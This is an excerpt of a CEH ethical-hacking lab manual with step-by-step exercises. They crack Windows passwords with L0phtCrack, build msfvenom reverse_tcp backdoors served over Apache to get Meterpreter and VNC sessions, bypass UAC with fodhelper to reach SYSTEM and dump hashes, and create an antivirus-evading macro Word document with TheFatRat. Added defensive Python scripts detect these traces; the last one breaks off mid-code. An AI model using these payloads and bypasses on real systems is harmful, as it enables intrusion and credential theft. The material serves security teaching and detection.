FIGURE 4.3: Password Auditing Wizard

8. In the Introduction wizard click Next.

FIGURE 4.4: Password Auditing Wizard, Introduction window
9. In the Choose Target System Type wizard choose the operating system
type and click Next. In this lab we are choosing Windows.

FIGURE 4.5: Choose target system type option

10. Choose the A remote machine radio button in the Windows Import wizard, and click
Next.

FIGURE 4.6: Windows Import option

11. In the Windows Import From Remote Machine (SMB) wizard, type in the
required details as shown in the screenshot.

12. In the Host field type the IP address of the target machine, here
Windows Server 2012 (10.10.10.12).

13. Select the Use Specific User Credentials radio button, and in the
Credentials section type the login credentials of the Windows Server 2012
machine:

Username: Administrator
Password: Pa$$w0rd

14. If the machine is in a domain, enter the domain name in the
Domain section; here Windows Server 2012 belongs to the CEH.com domain.

15. Once you have entered all the required fields, click Next to proceed.
16. In the Choose Audit Type wizard, select the Strong Password Audit radio
button and click Next.

FIGURE 4.7: Choose audit type section

17. In the Reporting Options wizard, check the Generate Report at End of Auditing
option, then choose the report type (here, CSV) and click the Browse
button to store the report in the desired location.

FIGURE 4.9: Reporting Options section

18. In this lab we are choosing the Desktop as the location. Type a file name, and click
Save in the Choose report file name window as shown in the screenshot.

FIGURE 4.10: Choose report file name window

19. Click Next in the Reporting Options wizard after providing the location.

FIGURE 4.11: Reporting Options section

20. Choose the Run this Job immediately radio button and click Next in the Job
Scheduling wizard.

FIGURE 4.12: Job Scheduling option

21. In the Summary wizard, click Finish.

FIGURE 4.13: Summary option
22. The Perform Calibration pop-up appears; click No to continue.

Note: The Perform Calibration pop-up will appear multiple times during the
password cracking process; click No every time it appears.

FIGURE 4.14: Perform Calibration window (calibration is an operation that
measures cracking speed; it is only performed once, and if it is not run the
default CPU-based settings are used)

23. The Copying LC7 Agent pop-up appears; click Yes to continue.

FIGURE 4.15: Copying LC7 Agent window. The dialog states that the LC7Agent will
be installed on the remote machine, warns that a man-in-the-middle attack is
possible unless NTLMv2 is used between the two machines, and notes that if this
is not acceptable the LC7 Agent can be installed by hand on the target (see the
documentation).

24. L0phtCrack starts cracking the passwords of the target machine. In the
lower right corner of the window you can see the status as shown in the
screenshot.

FIGURE 4.16: Cracking passwords in progress

25. L0phtCrack will show you the cracked passwords of the users that are
available on the target machine.

FIGURE 4.17: Cracked passwords

26. So, you have successfully obtained weak as well as strong passwords. You can
click the Stop button present at the lower left corner of the window once you
have all the passwords.


Lab Analysis

Document the results and reports gathered during the lab.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: No
Platform Supported: Classroom, iLabs
Exploiting Client Side Vulnerabilities and Establishing a VNC Session

Attackers use client-side vulnerabilities to exploit unpatched software, thereby attaining
access to the machine on which the software is installed.

Lab Scenario

VNC enables attackers to remotely access and control targeted computers from
another computer or mobile device, wherever they are in the world. At the same
time, it is also used by network administrators and organizations throughout every
industry sector for a range of different scenarios and use cases, including
providing IT desktop support to colleagues and friends, and accessing systems
and services on the move. Here, we will see how attackers can exploit
vulnerabilities in target systems to establish unauthorized VNC sessions and
remotely control these targets.

Lab Objectives

The objective of this lab is to help students learn how to exploit client-side
vulnerabilities and establish a VNC session.

Tools demonstrated in this lab are available in Z:\CEH-Tools\CEHv10
Module 06 System Hacking.

Lab Environment

To carry this out, you need:
- Kali Linux running in a virtual machine (attacker machine)
- Windows 10 running in a virtual machine (victim machine)
- A web browser
- Administrative privileges to run tools
Lab Duration
Time: 10 Minutes
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Overview of the Lab 


"This lab demonstrates the exploitation procedure enfotced on а weakly patched 
Windows 10 machine that allows you to gain remote access to it through a remote 


desktop connection. 
Lab Tasks 
Task: Launch Metasploit

1. Launch Kali Linux machine and login. Open a Terminal and type msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=(attacker machine IP address) LPORT=444 -o /root/Desktop/Test.exe and press Enter.

Note: Here the attacker machine IP address is 10.10.10.11 (Kali Linux Machine).

FIGURE 5.1: Generating the malicious file


2. This will generate Test.exe, a malicious file on Desktop as shown in the screenshot.

FIGURE 5.2: Malicious file on Desktop


3. Now create a directory to share this file with the victim's machine, provide the permissions and copy the file from Desktop to the shared folder:
a. Type mkdir /var/www/html/share and press Enter to create a share folder.
b. Type chmod -R 755 /var/www/html/share and press Enter.
c. Type chown -R www-data:www-data /var/www/html/share and press Enter.
d. Now copy the malicious file to the shared location by typing cp /root/Desktop/Test.exe /var/www/html/share and press Enter.


4. Now start the apache service; to do this type service apache2 start and press Enter.
5. Type msfconsole and press Enter to launch Metasploit framework.
6. In msf console type use multi/handler and press Enter.

Task: Setting Payload

7. Now we need to set the payload, LHOST and LPORT. To do this:
a. Type set payload windows/meterpreter/reverse_tcp and press Enter.
b. Type set LHOST 10.10.10.11 and press Enter.
c. Type set LPORT 444 and press Enter.
8. Type exploit and press Enter to start the listener. Leave the Kali Linux machine running and switch to Windows 10 machine.

FIGURE 5.7: Starting the listener


Task: Run Exploit

9. Login to Windows 10 machine, and open a browser. In this lab we are using the Chrome browser.
10. In the address bar of the browser type http://10.10.10.11/share and press Enter.
11. As soon as you press Enter, it will display the share folder contents as shown in the screenshot.
12. Click Test.exe file to download.

Note: 10.10.10.11 is the IP address of the attacker machine i.e., Kali Linux.

FIGURE: Browser showing the Index of /share page
13. The malicious file will be downloaded in the default downloads location of the browser. Here in this lab Downloads is the location. Now, double-click the Test.exe file to run.

FIGURE 5.9: Malicious file successfully downloaded


14. Open File - Security Warning window appears. Click Run. Leave the Windows 10 machine running, and switch to Kali Linux machine.

FIGURE: Open File - Security Warning dialog (Type: Application; Always ask before opening this file)
15. Now switch to the attacker machine i.e., Kali Linux machine. Observe that one session is created or opened in the Meterpreter shell as shown in the screenshot.

FIGURE 5.11: Meterpreter shell session obtained

16. To open a session in Meterpreter shell, type sessions -i 1 and press Enter.

Note: If the Meterpreter shell is connected to the session automatically, then skip this step.

FIGURE 5.12: Connecting to the victim machine through the meterpreter shell


17. Meterpreter shell appears as shown in the screenshot. Type sysinfo and press Enter to verify that Windows 10 machine is hacked.

Task: Remote View

18. Now, create a VNC session to access the Windows 10 machine remotely.
19. Type run vnc and press Enter.

FIGURE 5.14: Opening a VNC session

20. This will open a VNC session of the Victim's machine as shown in the screenshot.

FIGURE 5.15: Victim system accessed through a VNC session
Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion regarding your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
Escalating Privileges by Exploiting Client Side Vulnerabilities

Privilege escalation is the act of exploiting a bug, configuration flaw, or design oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

Lab Scenario

Once attackers gain access to the target system, they start looking for different ways to escalate their privilege in the system. They can exploit a vulnerability, design flaw or configuration oversight in the operating system or software applications on the target system to gain elevated access to resources that are normally protected from an application or user. The privilege escalation can be vertical or lateral.


Lab Objectives

The objective of this lab is to help students learn how to escalate privileges on a victim machine by exploiting its vulnerabilities.

Lab Environment

To perform this lab, you need:
= Windows 8 running as virtual machine
= Windows 10 running as virtual machine
= Kali Linux running as virtual machine

Lab Duration

Time: 20 Minutes


CEH Lab Manual Page 493
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.


Overview of the Lab

This lab demonstrates the exploitation procedure enforced on a weakly patched Windows 8 machine that allows you to gain access to it through a meterpreter shell, and then employs privilege escalation techniques to attain administrative privileges on the machine through the meterpreter shell.


Lab Tasks

Note: Before performing this lab, log in to Kali Linux virtual machine. Click Places > Computer. Navigate to File System > etc > apache2, open apache2.conf, add the directive ServerName localhost on a new line, and save the file.

Task: Create Backdoor

1. Launch Windows 10 virtual machine and log in to its administrator account.
2. Switch to Kali Linux virtual machine and log into it.
3. Launch a command line terminal.
4. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe and press Enter.

FIGURE 6.1: Creating the payload

5. The above command will create a Windows executable file named "Exploit.exe", which will be saved on the Kali Linux desktop.

FIGURE 6.2: Created Exploit.exe file

Note: Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
Task: Share Exploit.exe File

6. Now you need to share Exploit.exe with the victim machine (in this lab, we are using Windows 10 as the victim machine).
7. Open a new command line terminal, type the command mkdir /var/www/html/share and press Enter to create a new directory named share.

FIGURE: Creating the share directory

8. Change the mode for the share folder to 755 by typing the command chmod -R 755 /var/www/html/share/ and press Enter.

FIGURE: Changing the mode of the share folder

9. Change the ownership of that folder to www-data, by typing the command chown -R www-data:www-data /var/www/html/share/ and pressing Enter.

FIGURE 6.5: Changing the ownership of the folder

10. Type the command ls -la /var/www/html/ | grep share and press Enter.
11. The next step is to start the apache server. Type the command service apache2 start and press Enter.

FIGURE 6.6: Starting Apache server

12. Now that the apache web server is running, copy Exploit.exe file into the share folder.
13. Type the command cp /root/Desktop/Exploit.exe /var/www/html/share/ in the terminal, and press Enter.

Note: To run the apache web server use the command: cp /root/.msf4/data/exploits/* /var/www/share/

FIGURE: Copying the exploit file into the share folder

14. Type msfconsole in the terminal and press Enter.

FIGURE: Launching msfconsole
15. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework.
16. Now issue the following commands in msfconsole:
a) Type set payload windows/meterpreter/reverse_tcp and press Enter.
b) Type set LHOST 10.10.10.11 and press Enter.

FIGURE 6.10: Configuring the payload and exploit

17. To start the handler, type the command exploit -j -z and press Enter.

FIGURE 6.11: Exploiting the Windows machine (handler running)

Task: Run the Exploit

18. Now, switch to Windows 10 virtual machine.
19. Launch Chrome. Type the URL http://10.10.10.11/share/ in the address bar, and press Enter.

Note: Here 10.10.10.11 is the IP address of Kali Linux, which may vary in your lab environment.

20. You will be redirected to the apache index webpage. Click Exploit.exe link to download the backdoor file.

FIGURE 6.12: Downloading Exploit.exe from the Index of /share page
21. Once the file is downloaded, navigate to the download location of the browser and double-click Exploit.exe file to execute. In this lab the default location is Downloads folder.

FIGURE 6.13

Note: If you don't have apache2 installed, run apt-get install apache2.

22. If an Open File - Security Warning window appears, click Run.
23. Leave the Windows machine running, so that Exploit.exe file runs in background, and now switch to Kali Linux machine.
24. Switch back to the Kali Linux machine. Meterpreter session has been successfully opened, as shown in the following screenshot:

FIGURE 6.15: Meterpreter session opened
Task: Establish a Session

25. Type sessions -i 1 and press Enter (1 in sessions -i 1 command is the id number of the session). Meterpreter shell is launched, as shown in the following screenshot:

FIGURE 6.16: Meterpreter session launched

26. Type getuid and press Enter. This displays the current user ID, as shown in the following screenshot:

FIGURE: Viewing the current user ID

27. You will observe that the Meterpreter server is running with normal user privileges.
28. You will not be able to execute commands (such as hashdump, which dumps the user account hashes located in the SAM file; clearev, which clears the event logs remotely; etc.) that require administrative/root privileges.
29. Let us check this by executing the run post/windows/gather/smart_hashdump command:
30. The command fails to dump the hashes from the SAM file located in Windows 10 and returns an error stating Insufficient Privileges to dump hashes.
31. From this, it is evident that Meterpreter server requires admin privileges to perform such actions.
32. Now, we shall try to escalate the privileges by issuing a getsystem command that attempts to elevate the user privileges.
33. The command issued is:
a. getsystem -t 1: which uses the Service - Named Pipe Impersonation (In Memory/Admin) Technique

FIGURE 6.19: Trying the getsystem command

34. The command fails to escalate privileges and returns an error stating Access is denied.
35. From the above result, it is evident that the security configuration of the Windows 10 machine is blocking you from gaining unrestricted access to the machine.
36. Now, we shall try to bypass the user account control setting that is blocking you from gaining unrestricted access to the machine.
37. You will now:
a. move the current meterpreter session to the background,
b. use the bypassuac_fodhelper exploit for windows,
c. set the meterpreter/reverse_tcp payload,
d. configure the exploit and payload,
e. exploit the machine using the above configured payload in an attempt to elevate the privileges.
38. Type background and press Enter. This command moves the current meterpreter session to the background.

FIGURE 6.20: Backgrounding the session

39. Type use exploit/windows/local/bypassuac_fodhelper and press Enter.
40. Here, you need to configure the exploit. To know which options you need to configure in the exploit, type show options and press Enter.

FIGURE: Module options (Name, Current Setting, Required, Description)

41. The Module options section appears, displaying the requirements for the exploit.
42. You will observe that the SESSION option is required, but the current setting is empty.
43. Type set SESSION 1 (1 is the current meterpreter session which was put in the background in this lab) and press Enter.
44. Now that we have configured the exploit, our next step will be to set a payload and configure it.
45. Type set payload windows/meterpreter/reverse_tcp and press Enter to set the meterpreter/reverse_tcp payload.
46. The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter.

FIGURE: Setting the payload

47. The Module options section appears, displaying the previously configured exploit. Here, you can observe that the session value is set.
48. The Payload options section displays the requirements for the payload.
49. Observe that:
a. LHOST option is required, but the current setting is empty. Here, you need to set the IP Address of the local host i.e., Kali Linux.
b. EXITFUNC option is required but the current setting is already set to process, so ignore this option.
c. LPORT option is required but the current setting is already set to port number 4444, so ignore this option.
50. To set the LHOST option, type set LHOST 10.10.10.11 and press Enter.
51. To set the TARGET option, type set TARGET 0 and press Enter. Here 0 is nothing but the Exploit Target ID.

Note: In this lab, 10.10.10.11 is the IP Address of the attacker machine (i.e., Kali Linux), which might vary in your lab environment.

52. You have successfully configured the exploit and payload. Type exploit and press Enter. This begins to exploit the UAC settings in Windows 10 machine.
53. As you can see, BypassUAC exploit has successfully bypassed the UAC setting on the Windows 10 machine; you have now successfully attained a meterpreter session.

FIGURE 6.25: Meterpreter session opened
54. Now, let us check the current User ID status of meterpreter by issuing the getuid command. You will observe that Meterpreter server is still running with normal user privileges.

FIGURE 6.26: Viewing the current user ID

55. At this stage, we shall re-issue the getsystem command with the -t 1 switch, in an attempt to elevate privileges.
56. Type getsystem -t 1 and press Enter.
57. This time, the command has successfully escalated user privileges and returns a message stating got system, as shown in the following screenshot:

FIGURE 6.27: Issuing the getsystem command

58. Now, type getuid and press Enter. The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM), as shown in the screenshot:
59. Let us check if we have successfully attained the SYSTEM/admin privileges by issuing a meterpreter command that requires these privileges in order to be executed.
60. For instance, we shall try to obtain hashes located in the SAM file of Windows 10.
61. Type the command run post/windows/gather/smart_hashdump and press Enter. This time, meterpreter successfully extracted the NTLM hashes and displayed them as shown in the following screenshot:

FIGURE 6.29: Dumping the hashes

62. Thus, you have successfully escalated privileges by exploiting the Windows 10 machine's vulnerabilities.
63. You can now execute commands (clearev, which clears the event logs remotely, etc.) that require administrative/root privileges.
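Every lab in this module stages the payload on the Kali Apache server under /share and has the victim fetch it with a browser: the VNC lab above and this one, and the TheFatRat and Backdoor.exe labs that follow. On the defender's side that leaves a trace in the web server's access log. The following triage script is an added example, not part of the lab manual; it parses constructed Apache combined-format log lines (the victim addresses 10.10.10.10 and 10.10.10.12, the timestamps and the byte counts are made up; 10.10.10.11 is the lab's Kali server) and flags successful fetches of executables and macro documents, noting whether the client browsed the directory listing first, as in the lab's Index of /share click-through.

```python
"""Added example: triage an Apache access log for the payload-staging pattern
used in these labs (files served from /share, fetched by a browser).
Log lines below are constructed; 10.10.10.11 is the lab's Kali server."""
import re
from collections import defaultdict

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# File types the labs stage on the web server: raw executables and macro documents.
RISKY_EXTENSIONS = {".exe", ".dll", ".scr", ".hta", ".ps1", ".docm", ".dotm", ".xlsm", ".pptm"}

# Constructed sample (victim addresses, timestamps and sizes are made up).
SAMPLE_LOG = """\
10.10.10.10 - - [12/Mar/2019:10:14:02 +0000] "GET /share/ HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/72.0"
10.10.10.10 - - [12/Mar/2019:10:14:09 +0000] "GET /share/Test.exe HTTP/1.1" 200 73802 "http://10.10.10.11/share/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/72.0"
10.10.10.12 - - [12/Mar/2019:10:21:40 +0000] "GET /share/BadDoc.docm HTTP/1.1" 200 41230 "-" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0)"
10.10.10.12 - - [12/Mar/2019:10:22:01 +0000] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0)"
10.10.10.10 - - [12/Mar/2019:10:25:13 +0000] "GET /share/Exploit.exe HTTP/1.1" 404 196 "-" "curl/7.64.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def extension(path):
    """Lower-cased extension of the last path segment, query string ignored."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def find_staged_downloads(log_text):
    """One finding per successful (200) GET of a risky file. Each finding also
    records whether the same client listed the file's directory earlier in the
    log, the click-through the labs perform on the 'Index of /share' page."""
    listings = defaultdict(set)   # client -> directories it has listed so far
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] != "GET":
            continue
        path = rec["path"].split("?", 1)[0]
        if path.endswith("/"):                     # directory listing request
            listings[rec["client"]].add(path)
            continue
        if extension(path) in RISKY_EXTENSIONS and rec["status"] == "200":
            directory = path.rsplit("/", 1)[0] + "/"
            findings.append({
                "client": rec["client"],
                "time": rec["time"],
                "path": path,
                "bytes": int(rec["size"]) if rec["size"] != "-" else 0,
                "agent": rec["agent"],
                "browsed_listing_first": directory in listings[rec["client"]],
            })
    return findings


if __name__ == "__main__":
    for f in find_staged_downloads(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} fetched {f['path']} ({f['bytes']} bytes), "
              f"listed directory first: {f['browsed_listing_first']}, agent: {f['agent']}")
```

The 404 for Exploit.exe is deliberately not reported; a production rule would keep failed probes as well, but here the point is the successful staging fetch.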

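The privilege-escalation steps above also leave host-side evidence a defender can look for: the backdoor runs from the user's Downloads folder, the fodhelper bypass makes the auto-elevating fodhelper.exe spawn a child process it never spawns legitimately, and clearev wipes the event logs, which Windows itself records (event 1102 for the Security log, 104 for the System and Application logs). The following triage is an added example, not from the lab manual; the event records are constructed, with field names as Windows Security event 4688 (process creation) exports them, and the TokenElevationType value %%1937 is Windows' code for a full (elevated) token.

```python
"""Added example: triage Windows event records for the host-side traces of this
lab's post-exploitation steps. The records are constructed; field names follow
Windows Security event 4688 (process creation) and 1102/104 (log cleared)."""

# Constructed events, in the order the lab produces them: Exploit.exe is run
# from Downloads, the UAC bypass drives fodhelper.exe, fodhelper spawns the
# elevated child, and finally the logs are cleared (meterpreter's clearev).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Channel": "Security", "SubjectUserName": "Admin",
     "NewProcessName": r"C:\Users\Admin\Downloads\Exploit.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "TokenElevationType": "%%1938"},
    {"EventID": 4688, "Channel": "Security", "SubjectUserName": "Admin",
     "NewProcessName": r"C:\Windows\System32\fodhelper.exe",
     "ParentProcessName": r"C:\Users\Admin\Downloads\Exploit.exe", "TokenElevationType": "%%1937"},
    {"EventID": 4688, "Channel": "Security", "SubjectUserName": "Admin",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\fodhelper.exe", "TokenElevationType": "%%1937"},
    {"EventID": 4688, "Channel": "Security", "SubjectUserName": "Admin",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "TokenElevationType": "%%1938"},
    {"EventID": 1102, "Channel": "Security", "SubjectUserName": "SYSTEM"},
    {"EventID": 104, "Channel": "System", "SubjectUserName": "SYSTEM"},
]

# Folders an unprivileged user can write to; the labs run the backdoor from Downloads.
USER_WRITABLE_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\")
# Windows binaries that auto-elevate under default UAC and normally spawn no children.
AUTO_ELEVATE_PARENTS = ("\\fodhelper.exe",)
# Event IDs Windows writes when a log is cleared (1102 Security, 104 System/Application).
LOG_CLEARED = {(1102, "Security"), (104, "System"), (104, "Application")}
FULL_TOKEN = "%%1937"   # TokenElevationType: the process received a full admin token


def _low(value):
    return (value or "").lower()


def check_process_creation(ev):
    """Rules for one 4688 record; returns the list of findings it triggers."""
    new, parent = _low(ev.get("NewProcessName")), _low(ev.get("ParentProcessName"))
    findings = []
    if any(d in new for d in USER_WRITABLE_DIRS):
        findings.append({"rule": "exec_from_user_dir", "severity": "medium",
                         "detail": f"{ev['NewProcessName']} started from a user-writable folder "
                                   f"by {ev.get('SubjectUserName')}"})
    if parent.endswith(AUTO_ELEVATE_PARENTS):
        sev = "high" if ev.get("TokenElevationType") == FULL_TOKEN else "medium"
        findings.append({"rule": "auto_elevate_child", "severity": sev,
                         "detail": f"{ev['ParentProcessName']} spawned {ev['NewProcessName']} "
                                   f"(UAC-bypass pattern; elevated={sev == 'high'})"})
    return findings


def triage(events):
    """Run every rule over the records and return the findings in event order."""
    findings = []
    for ev in events:
        eid, chan = ev.get("EventID"), ev.get("Channel")
        if eid == 4688:
            findings.extend(check_process_creation(ev))
        elif (eid, chan) in LOG_CLEARED:
            findings.append({"rule": "log_cleared", "severity": "high",
                             "detail": f"{chan} event log cleared by {ev.get('SubjectUserName')}"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['detail']}")
```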

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom
Hacking Windows Server 2012 with a Malicious Office Document using TheFatRat

TheFatRat is an easy tool that compiles malware with popular payloads, and the compiled malware can then be executed on Windows, Android, and Mac.

Lab Scenario

Social Engineering is one of the most typically used attacks by a hacker. As the recent trends suggest, many big organizations fall victim to this attack vector. The attackers trick the staff of a workplace to click links in a legitimate looking document which turns out to be malicious and even able to evade the anti-virus programmes.

In this lab we shall find out how to create a malicious office document and get a meterpreter shell by bypassing anti-virus systems.

Lab Objectives

The objective of this lab is to help students learn:
* How to use an office document to exploit a Windows machine

Lab Environment

To carry out this lab, you need:
= A computer running Windows Server 2016
= Kali Linux running as a virtual machine
= Windows Server 2012 running as a virtual machine

Note: Tools demonstrated in this lab are available in Z:\CEH-Tools\CEHv10 Module 06 System Hacking

Lab Duration

Time: 15 Minutes
Overview of TheFatRat

TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.

Lab Tasks


Task: Set Up TheFatRat

1. Log into the Kali Linux machine and open a Terminal window. Type git clone https://github.com/Screetsec/TheFatRat and hit Enter.

Note: TheFatRat is already preinstalled in the Kali Linux machine; you can skip to step 8.

FIGURE 7.1: Cloning TheFatRat

2. After the cloning is completed, type cd TheFatRat/ and hit Enter.

FIGURE 7.2: Output of the clone

3. Type chmod -R 755 /root/TheFatRat and hit Enter as shown in the screenshot.

FIGURE 7.3
4. Type ./setup.sh and hit Enter to begin the installation as shown in the screenshot.

FIGURE 7.4: Running setup.sh

5. An UPDATING KALI REPO popup appears as shown in the screenshot. Let it finish updating the Kali packages.

FIGURE 7.5: Updating Kali repo window

6. After the update window closes, TheFatRat asks to create a shortcut in the system. Type y and hit Enter.

FIGURE 7.6: Creating a shortcut
7. A Warning appears as shown in the screenshot. Hit Enter to continue.

FIGURE 7.7: Warning message given by TheFatRat

8. After the installation is complete, in the Terminal window type fatrat and hit Enter.

FIGURE 7.8: Launching TheFatRat
9. FatRat launches and starts to verify the installed dependencies as shown in the screenshot.

FIGURE 7.9: Checking the dependencies

10. Service Running messages come on the screen as shown in the screenshot. Press Enter to continue.
11. You will get multiple prompts saying press Enter to continue; do so to continue.
12. TheFatRat menu comes up as shown in the screenshot. Choose [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] by typing 6 in the menu and hit Enter.

FIGURE: TheFatRat menu
13. PwnWinds menu appears as shown in the screenshot. Choose [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu and hit Enter.

FIGURE: PwnWinds menu

14. Type 10.10.10.11 in the Set LHOST IP option and hit Enter.
15. In the Set LPORT option, type 4444 and hit Enter.
16. Type payload in the Please enter the base name for output files option and hit Enter as shown in the screenshot.
17. In the Choose Payload option, choose [3] windows/meterpreter/reverse_tcp by typing 3 and hit Enter.

FIGURE: Choosing the payload option
18. TheFatRat generates a payload exe file located at Home/TheFatRat/output, as shown in the screenshot.

FIGURE: Generated payload in the output folder

Task: Make Malicious Word File

19. Now to go back to the main menu, choose [8] Back to menu by typing 8 and hit Enter.

FIGURE 7.18: Going back to the main menu
20. From the menu, choose [07] Create Backdoor For Office with Microsploit by typing 7 and hit Enter as shown in the screenshot.

FIGURE: TheFatRat main menu
21. Microsploit menu appears; choose option [2] The Microsoft Office Macro on Windows by typing 2 and hit Enter.

FIGURE 7.20: Microsploit menu

22. Type 10.10.10.11 in the Set LHOST IP option and hit Enter.
23. In the Set LPORT option, type 4444 and hit Enter.

FIGURE 7.22: Setup options
24. Type BadDoc in the Enter the base name for output files option and hit Enter as shown in the screenshot.

FIGURE 7.23: Entering the base name

25. In Enter the message for the document body (ENTER = default): type you have been hacked! and hit Enter.

FIGURE 7.24: Entering the message for the document body
26. In the Are u want Use custom exe file backdoor (y/n) option, type y and hit Enter.
27. Type /root/TheFatRat/output/payload.exe as the Path and hit Enter.

FIGURE: Specifying the path to payload.exe

28. In the Choose Payload option, choose [3] windows/meterpreter/reverse_tcp by typing 3 and hit Enter.

FIGURE 7.27: Choosing the payload option
29. The malicious document details appear as shown in the screenshot. Hit Enter to continue.

FIGURE 7.28: Backdoor created prompt

30. Navigate to Home/TheFatRat/output to find the generated word file as shown in the screenshot.

FIGURE 7.29: Word file in the output folder
Task: Set Up a Listener

31. Open another terminal window and launch metasploit by typing msfconsole and hit Enter.

FIGURE: Launching msfconsole

32. Wait for metasploit to start. Then type use multi/handler in the msf command line and hit Enter.

FIGURE: Setting up the handler

33. Type set payload windows/meterpreter/reverse_tcp and hit Enter as shown in the screenshot.

FIGURE: Setting the payload for the listener
34. Type set LHOST 10.10.10.11 and hit Enter, type set LPORT 4444 and hit Enter, and finally type show options and hit Enter.

FIGURE: Listener options

35. Now type run and hit Enter to start the listener.

Task: Share the Malicious Document File

36. Now open another terminal window and type cp /root/TheFatRat/output/BadDoc.docm /var/www/html/share/ and hit Enter.
37. Then type service apache2 start and hit Enter.

FIGURE: Starting the apache2 service

38. Now switch to Windows Server 2012 system and open a browser (here Internet Explorer).
39. In the address bar type http://10.10.10.11/share/ as the URL and hit Enter.
40. Index of /share page appears; click BadDoc.docm to download it.

Task: Open the Document

41. Click Save in the download prompt as shown in the screenshot.

FIGURE: Index of /share page with the download prompt
42. Open your Downloads folder and double-click the word file downloaded in the previous step.

FIGURE 7.34: Downloaded word document

43. MS Word opens the file in Protected View. Click Enable Editing as shown in the screenshot.

FIGURE 7.39: Enable Editing option in MS Word

44. A Security Warning appears; click Enable Content as shown in the screenshot.

FIGURE: Security Warning bar; the document body carries the lure text "This document was created by a newer version of Microsoft Office. Macros must be enabled to display the contents of the document."

45. Now if you switch back to the Kali Linux system, you will find that a Meterpreter session has opened in the metasploit terminal.

FIGURE 7.41: Meterpreter session obtained

46. Type sessions -l and hit Enter to see all the active sessions as shown in the screenshot.

FIGURE 7.42: Viewing the created session ID
47. Type sessions -i 1 and hit Enter to get a meterpreter command line as shown in the screenshot.

FIGURE 7.43: Connecting to the meterpreter session

Task: View Exploited System Details

48. Type sysinfo and hit Enter to view the system details of the exploited computer as shown in the screenshot.

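The document built in this lab is a .docm whose macro only runs once the reader clicks Enable Editing and then Enable Content, and the lure text in the body exists to make them do so. The following inspector is an added example, not part of the lab manual or of TheFatRat: it unpacks an Office Open XML file and reports the VBA project part, the macro-enabled content types and any enable-macros lure phrases. The two sample documents it builds (one armed, one clean) are constructed in memory with a stub vbaProject.bin, so no TheFatRat output is needed to run it.

```python
"""Added example: inspect an Office Open XML document for the traits of the
macro-armed .docm built in this lab. The sample documents are constructed."""
import io
import re
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Phrases used to talk the reader into leaving Protected View; the last two are
# the lure text the lab's document shows.
LURE_PATTERNS = [
    r"enable (?:content|editing|macros)",
    r"macros? must be enabled",
    r"created (?:by|with|in) a newer version of microsoft office",
]


def build_sample(with_macro):
    """Constructed minimal .docx/.docm: content types, a body and, when armed,
    a vbaProject.bin stub plus the macro-enabled content types."""
    body_text = ("This document was created by a newer version of Microsoft Office. "
                 "Macros must be enabled to display the contents of the document."
                 if with_macro else "Quarterly report, nothing to enable.")
    doc_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macro
              else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{doc_ct}"/>'
        + (f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
           if with_macro else "")
        + "</Types>"
    )
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f"<w:body><w:p><w:r><w:t>{body_text}</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
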